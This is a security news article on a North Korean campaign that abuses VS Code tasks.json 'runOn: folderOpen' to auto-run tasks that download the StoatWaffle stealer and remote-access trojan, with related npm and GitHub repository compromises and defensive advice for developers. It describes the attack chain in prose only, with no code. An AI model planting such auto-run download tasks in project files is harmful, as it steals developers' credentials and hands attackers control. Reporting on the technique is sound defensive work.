North Korean Hackers Exploit VS Code Auto-Run Tasks to Deploy StoatWaffle Malware
In a sophisticated cyber espionage campaign, North Korean state-sponsored hackers, identified as the group behind the Contagious Interview campaign—also known as WaterPlum—have been observed leveraging Microsoft Visual Studio Code (VS Code) to distribute a new malware strain named StoatWaffle. This tactic, first detected in December 2025, involves manipulating VS Code’s tasks.json configuration to automatically execute malicious code upon opening any file within the project folder.
Mechanism of Attack
The attackers craft malicious VS Code projects containing a tasks.json file configured with the runOn: folderOpen option. This setting ensures that the embedded tasks execute automatically whenever the project folder is accessed in VS Code, regardless of the operating system in use. Upon activation, the task initiates a sequence of actions:
1. Payload Retrieval: The task downloads data from a web application hosted on Vercel, a cloud platform for frontend frameworks and static sites.
2. Node.js Verification: The malware checks for the presence of Node.js in the system. If absent, it downloads and installs Node.js from the official website.
3. Downloader Execution: A downloader script is executed, which periodically contacts an external server to fetch subsequent payloads.
4. Module Deployment: The final payload comprises two primary modules:
– Stealer Module: This component extracts credentials and extension data from web browsers, including Chromium-based browsers and Mozilla Firefox. On macOS systems, it also targets the iCloud Keychain database. The harvested data is then transmitted to a command-and-control (C2) server.
– Remote Access Trojan (RAT) Module: This module establishes communication with the C2 server, enabling the execution of various commands on the infected host. These commands include directory navigation, file enumeration, execution of Node.js code, file uploads, recursive directory searches, shell command execution, and self-termination of the malware.
Broader Implications and Related Campaigns
The deployment of StoatWaffle is part of a broader strategy by North Korean threat actors to infiltrate developer environments and exfiltrate sensitive information. This campaign is notable for its innovative use of legitimate development tools to facilitate malware distribution, thereby increasing the likelihood of successful infiltration.
In addition to the StoatWaffle campaign, the same threat actors have been implicated in other malicious activities targeting the open-source ecosystem:
– Malicious npm Packages: The group has been linked to the distribution of PylangGhost, a Python-based backdoor, through compromised npm packages. This marks the first instance of PylangGhost being propagated via npm, highlighting the expanding scope of their attack vectors.
– PolinRider Campaign: In this operation, the attackers implanted obfuscated JavaScript payloads in numerous public GitHub repositories. This led to the deployment of an updated version of BeaverTail, a known stealer and downloader malware associated with the Contagious Interview campaign.
– Neutralinojs Repository Compromise: The attackers compromised four repositories within the Neutralinojs GitHub organization. By gaining access to a contributor’s account with organization-level write permissions, they injected malicious JavaScript code designed to retrieve encrypted payloads from blockchain transactions, ultimately downloading and executing BeaverTail.
Recommendations for Developers
Given the increasing sophistication of these attacks, developers are urged to adopt stringent security practices:
– Exercise Caution with External Repositories: Be vigilant when cloning and opening projects from unfamiliar or untrusted sources.
– Review Configuration Files: Thoroughly inspect tasks.json and other configuration files for any suspicious or unauthorized tasks before executing them.
– Maintain Updated Security Software: Ensure that all security tools and software are up to date to detect and mitigate potential threats effectively.
– Limit Permissions: Restrict the execution of scripts and tasks to trusted sources and environments to minimize the risk of unauthorized code execution.
By implementing these measures, developers can enhance their defenses against such sophisticated cyber threats and protect their systems and data from compromise.
